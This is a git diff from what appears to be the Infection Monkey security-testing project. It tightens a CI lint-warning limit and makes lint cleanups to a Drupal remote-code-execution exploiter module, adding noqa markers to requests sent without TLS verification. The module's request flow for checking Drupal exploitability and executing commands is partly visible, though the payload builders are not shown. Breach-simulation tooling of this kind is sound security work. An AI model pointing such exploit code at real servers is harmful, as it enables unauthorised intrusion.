diff --git a/.travis.yml b/.travis.yml index fcd9fc36b..fc079ea76 100644 --- a/.travis.yml +++ b/.travis.yml @@ -72,7 +72,7 @@ script: ## Display the linter issues - cat flake8_warnings.txt ## Make sure that we haven't increased the amount of warnings. -- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90 +- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80 - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi ## Check import order diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py index 3a333d827..84919baef 100644 --- a/monkey/infection_monkey/exploit/drupal.py +++ b/monkey/infection_monkey/exploit/drupal.py @@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__) class DrupalExploiter(WebRCE): _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Drupal Server' - DRUPAL_PORTS = [[80, False], [443, True]] def __init__(self, host): super(DrupalExploiter, self).__init__(host) @@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE): """ payload = build_exploitability_check_payload(url) - response = requests.get(f'{url}?_format=hal_json', + response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 json=payload, headers={"Content-Type": "application/hal+json"}, verify=False) @@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE): base = remove_port(url) payload = build_cmd_execution_payload(base, cmd) - r = requests.get(f'{url}?_format=hal_json', + r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 json=payload, headers={"Content-Type": "application/hal+json"}, verify=False) - + if is_response_cached(r): LOG.info(f'Exploiting {url} returned cache HIT, may have failed') @@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE): :return: vulnerable URL to exploit """ return self.vulnerable_urls.pop() - + def are_vulnerable_urls_sufficient(self): """ For the Drupal exploit, 5 distinct URLs are needed to perform the full attack. @@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100 articles = set() while lower < upper: node_url = urljoin(base_url, str(lower)) - response = requests.get(node_url, verify=False) + response = requests.get(node_url, verify=False) # noqa: DUO123 if response.status_code == 200: if is_response_cached(response): LOG.info(f'Found a cached article at: {node_url}, skipping')